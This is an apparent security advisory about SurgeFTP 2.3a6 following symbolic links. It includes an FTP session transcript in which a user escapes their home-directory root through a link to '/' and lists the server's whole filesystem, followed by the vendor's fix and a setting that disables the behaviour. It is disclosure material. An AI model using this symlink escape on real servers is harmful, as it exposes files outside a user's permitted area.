SurgeFTP will follow symbolic links, so exploiting this is as easy as being able to create links to directories of your choosing.
rush@ubuntu:~$ ftp example
Connected to example.
220 SurgeFTP example (Version 2.3a6)
Name (example:rush): test
331 Password required for test.
Password:
230- Alias Real path Access
230- / /home/test read+write
230 User test logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/" is current directory.
ftp> ls
200 PORT command successful.
150 Opening BINARY connection for /
-rw------- 1 test test 75 Jun 4 22:09 .bash_history
-rw-r--r-- 1 test test 220 Jun 4 22:07 .bash_logout
-rw-r--r-- 1 test test 3115 Jun 4 22:07 .bashrc
-rw-r--r-- 1 test test 675 Jun 4 22:07 .profile
lrwxrwxrwx 1 test test 4096 Jun 4 22:09 fs -> /
226 Transfer complete.
ftp> cd fs
250 CWD command successful now (/fs)
ftp> pwd
257 "/fs" is current directory.
ftp> ls
200 PORT command successful.
150 Opening BINARY connection for /fs
drwxr-xr-x 2 root root 4096 May 15 0:10 bin
drwxr-xr-x 3 root root 4096 May 15 13:34 boot
lrwxrwxrwx 1 root root 4096 Apr 28 12:02 cdrom -> media/cdrom
drwxr-xr-x 3 root root 4096 May 22 14:32 debian
drwxr-xr-x 15 root root 3800 Jun 4 13:11 dev
drwxr-xr-x 160 root root 12288 Jun 4 22:07 etc
drwxr-xr-x 6 root root 4096 Jun 4 22:07 home
lrwxrwxrwx 1 root root 7534504 May 15 0:25 initrd.img -> boot/initrd.img-2.6.28-11-generic
lrwxrwxrwx 1 root root 8220906 Apr 28 12:34 initrd.img.old -> boot/initrd.img-2.6.27-7-generic
drwxr-xr-x 20 root root 12288 May 22 14:18 lib
drwx------ 2 root root 16384 Apr 28 12:01 lost+found
drwxr-xr-x 3 root root 4096 Oct 29 2008 media
drwxr-xr-x 2 root root 4096 Oct 20 2008 mnt
drwxr-xr-x 3 root root 4096 May 29 1:18 opt
dr-xr-xr-x 153 root root 0 Jun 4 13:09 proc
drwxr-xr-x 13 root root 4096 May 22 16:43 root
drwxr-xr-x 2 root root 4096 May 15 20:09 sbin
drwxr-xr-x 2 root root 4096 Mar 6 11:21 selinux
drwxr-xr-x 2 root root 4096 Oct 29 2008 srv
drwxr-xr-x 12 root root 0 Jun 4 13:09 sys
drwxrwxrwt 17 root root 20480 Jun 4 21:50 tmp
drwxr-xr-x 12 root root 4096 May 22 14:18 usr
drwxr-xr-x 16 root root 4096 May 22 14:10 var
lrwxrwxrwx 1 root root 3501776 May 15 0:25 vmlinuz -> boot/vmlinuz-2.6.28-11-generic
lrwxrwxrwx 1 root root 2244272 Apr 28 12:34 vmlinuz.old -> boot/vmlinuz-2.6.27-7-generic
226 Transfer complete.
ftp> cd /
250 CWD command successful now (/)
ftp> pwd
257 "/" is current directory.
ftp> ls
200 PORT command successful.
150 Opening BINARY connection for /
-rw------- 1 test test 75 Jun 4 22:09 .bash_history
-rw-r--r-- 1 test test 220 Jun 4 22:07 .bash_logout
-rw-r--r-- 1 test test 3115 Jun 4 22:07 .bashrc
-rw-r--r-- 1 test test 675 Jun 4 22:07 .profile
lrwxrwxrwx 1 test test 4096 Jun 4 22:09 fs -> /
226 Transfer complete.
ftp> bye
221 Closing connection - goodbye!
rush@ubuntu:~$
Since the user would have to be able to make the links in the first place (probably using a shell), so risk is low in most circumstances.
Vendor Response:
Thanks for reporting this, here is a new buildMuch better than nothing :)
http://netwinsite.com/ftp/misc/surgeftp_23a10_linux.tar.gz
This has a new setting
global_nosymlink "true"
which you can turn on to disable this behaviour.



